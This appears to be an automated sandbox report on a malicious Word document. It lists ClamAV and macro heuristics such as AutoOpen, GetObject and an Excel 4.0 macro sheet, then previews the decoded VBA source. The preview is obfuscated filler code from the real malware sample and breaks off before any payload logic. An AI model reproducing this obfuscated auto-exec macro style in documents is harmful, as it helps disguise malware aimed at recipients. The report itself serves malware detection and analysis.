MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and exhibits multiple high-severity heuristic firings related to VBA macros, including auto-execution markers like 'autoopen' and 'GetObject' calls. The presence of obfuscated VBA code suggests an attempt to conceal malicious activity, such as downloading and executing a secondary payload, which is a common tactic for malware distribution.
Heuristics 8
-
ClamAV: Doc.Malware.Dpxx-6863824-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dpxx-6863824-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 74463 bytes |
SHA-256: 6dab8991788cc740ef0e5111b13dc4b350b9c90c7afbd2f060ee205cfd381edb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "l508_39_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "t_0__2"
Function K9_763()
U2918415 = 532667031 - 500384989
Y_1730 = 707955830 + s___890
Select Case Q3_27_
Case 673620104
K9041755 = Chr(802957490 * Tan(K_5_4850))
h5463125 = o3_73_
Case 630865060
U4_46_7 = v_010_
Y__741 = v___84_
Case 482110841
k_2_8_3_ = 416266750
o84__7_ = H44_8_
End Select
q_00182_ = 396063325 - 662115800
J_1_3_ = 422720819 + B807__
Select Case u35_4_47
Case 277168866
G_6__89_ = Chr(985698536 * Tan(k78__7))
D_7377 = w__8_1
Case 745694497
j90_6_9 = Y_663_61
j8_66301 = P0__83
Case 814567607
i__3_1 = 718667579
j_2_6__ = M4___6_6
End Select
b6_216 = 264305446 - 139717851
F_694_ = 278789105 + w6__83
Select Case R67053
Case 583927250
L164_4_ = Chr(623460735 * Tan(K1_100_))
k06__4__ = m9_7004
Case 410405657
G_2182 = S__7__7
C01_702_ = i4665_4
Case 612439703
Q602767 = 540472436
z_0_3_23 = B59083
End Select
r88358 = 947279681 - 582157667
h16962 = 271529948 + Y760_3
Select Case I2119469
Case 220041650
m91249_8 = Chr(647937501 * Tan(j60_4_6))
D_0_7912 = z3_4_8
Case 421630093
D_903_ = Q__9358
w49990_9 = t3_3_7
Case 227823214
X4711_04 = 804525400
s45383_8 = s27997
End Select
b4__8_16 = 196773701 - 656276832
l194440_ = 599273966 + m126989
Select Case k_9765
Case 755467028
n7___360 = Chr(700958585 * Tan(X542_3))
Z7_9011 = G__8_2_
Case 937223718
N_1__3_9 = a936634
M__5_9_7 = J637506
Case 480470993
Y_794_80 = 558903128
u_231802 = h32345
End Select
j_176444 = 876656672 - 324418534
J2__4_11 = 173124531 + i_9__004
Select Case Y_294_
Case 587511501
A581__ = Chr(799571047 * Tan(H84__26))
Z8932300 = O1_7___
Case 583460371
j1_012__ = C39329
M6547209 = O__75_
Case 97868077
u315__3 = 616735897
j564250 = a__6_00
End Select
W94__16 = 515911793 - 104197173
N911915 = 41877715 + U_87810
Select Case i0323220
Case 630324574
S2__30 = Chr(148906362 * Tan(N26311))
T5_035__ = s_760__
Case 95083721
j5___388 = D25645
J_3_235 = t666___1
Case 85303498
v__482 = 408734274
C26_3_6 = L_9_702_
End Select
E_31530 = 498289534 - 683841658
n7724__9 = 939334201 + A720_6
Select Case L1723710
Case 607404833
C16_7_ = Chr(470534082 * Tan(r1740_))
u0750___ = O03545_
Case 641469592
a0_47__ = K7785__
T1033534 = r351753
Case 251036249
s_2832 = 912728271
s84844 = S7923_55
End Select
End Function
Function p7_6_8(G_275211, z32849_)
On Error Resume Next
V052422 = 320593413 - 897970229
C_62_8 = 405680589 + Z4___451
Select Case T96074
Case 296962639
N5535_8 = Chr(243868031 * Tan(n_59_1))
d6__1099 = H__76__
Case 417885420
Y_31__ = D_0056_
a499_7_ = N587_5_
Case 92017704
K__2_489 = 969838123
W_05438 = R5_508_9
End Select
E6___85 = 526132691 - 724091118
O__18724 = 835334687 + H59__2
Select Case U8_22_3_
Case 560561134
Y_338553 = Chr(126427085 * Tan(E6__483))
K__545_ = R08811
Case 286818218
F09_7_ = b44909_
a1__360 = M185_956
Case 90322472
L8_9__ = 647306733
i2_6784 = w4__90
End Select
Set z_4_4
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.